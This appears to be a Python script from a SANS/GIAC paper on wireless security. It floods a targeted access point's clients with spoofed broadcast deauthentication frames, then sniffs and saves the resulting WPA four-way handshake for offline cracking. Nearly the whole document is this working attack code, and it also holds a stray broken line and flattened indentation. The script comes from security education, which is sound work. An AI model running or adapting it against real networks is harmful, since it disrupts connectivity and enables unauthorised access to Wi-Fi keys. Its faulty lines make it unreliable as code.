1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
|
#!/usr/bin/env python
########################################
#
# This code is part of the SANS/GIAC Gold Paper titled
#
# Programming Wireless Security
#
# by Robin Wood (dninja@gmail.com), accepted May 2008
#
# For more information you can find the paper in the "Wireless Access" section of the
# SANS Reading Room at http://www.sans.org/reading_room/ or at www.digininja.org
#
########################################
import sys
from scapy import *
import pylorcon
interface = "ath0"
#interface = sys.argv[1]
eapol_packets = []
handshake_found = 0
injector = pylorcon.Lorcon("ath0", "madwifing")
injector.setfunctionalmode("INJECT")
injector.setmode("MONITOR")
injector.setchannel(11)
destination_addr = '\xff\xff\xff\xff\xff\xff' # i.e. broadcast
bss_id_addr = '\x00\x0e\xa6\xce\xe2\x28'
source_addr = bss_id_addr # The AP is sending the deauth
packet = "\xc0\x00\x3a\x01"
packet = packet + destination_addr
packet = packet + source_addr
packet = packet + bss_id_addr
packet = packet + "\x80\xcb\x07\x00";
def deauth(packet_count):
for n in range(packet_count):
injector.txpacket (packet)
mac = ":".join([i.zfill(2) for i in mac.split(":")]).lower()
def sniffEAPOL(p):
if p.haslayer(WPA_key):
layer = p.getlayer (WPA_key)
# First, check that the access point is the one we want to target
AP = p.addr3
if (not AP == bss_id_addr):
print AP
print "not ours\n"
return
if (p.FCfield & 1):
# Message come from STA
# From DS = 0, To DS = 1
STA = p.addr2
elif (p.FCfield & 2):
# Message come from AP
# From DS = 1, To DS = 0
STA = p.addr1
else:
# either ad-hoc or WDS
return
if (not tracking.has_key (STA)):
fields = {
'frame2': None,
'frame3': None,
'frame4': None,
'replay_counter': None,
'packets': []
}
tracking[STA] = fields
key_info = layer.key_info
wpa_key_length = layer.wpa_key_length
replay_counter = layer.replay_counter
WPA_KEY_INFO_INSTALL = 64
WPA_KEY_INFO_ACK = 128
WPA_KEY_INFO_MIC = 256
# check for frame 2
if ((key_info & WPA_KEY_INFO_MIC) and
(key_info & WPA_KEY_INFO_ACK == 0) and
(key_info & WPA_KEY_INFO_INSTALL == 0) and
(wpa_key_length > 0)) :
print "Found packet 2 for ", STA
tracking[STA]['frame2'] = 1
tracking[STA]['packets'].append (p)
# check for frame 3
elif ((key_info & WPA_KEY_INFO_MIC) and
(key_info & WPA_KEY_INFO_ACK) and
(key_info & WPA_KEY_INFO_INSTALL)):
print "Found packet 3 for ", STA
tracking[STA]['frame3'] = 1
# store the replay counter for this STA
tracking[STA]['replay_counter'] = replay_counter
tracking[STA]['packets'].append (p)
# check for frame 4
elif ((key_info & WPA_KEY_INFO_MIC) and
(key_info & WPA_KEY_INFO_ACK == 0) and
(key_info & WPA_KEY_INFO_INSTALL == 0) and
tracking[STA]['replay_counter'] == replay_counter):
print "Found packet 4 for ", STA
tracking[STA]['frame4'] = 1
tracking[STA]['packets'].append (p)
if (tracking[STA]['frame2'] and tracking[STA]['frame3'] and tracking[STA]['frame4']):
print "Handshake Found\n\n"
wrpcap ("/var/gold/a.pcap", tracking[STA]['packets'])
handshake_found = 1
sys.exit(0)
tracking = {}
for i in range(1, 10):
print "About to deauth\n\n"
deauth(50)
print "Deauth done, sniffing for EAPOL traffic"
# reset the tracking between each sniffing attempt
tracking = {}
sniff(iface=interface,prn=sniffEAPOL, count=1000, timeout=30)
print "No handshake found\n\n"
|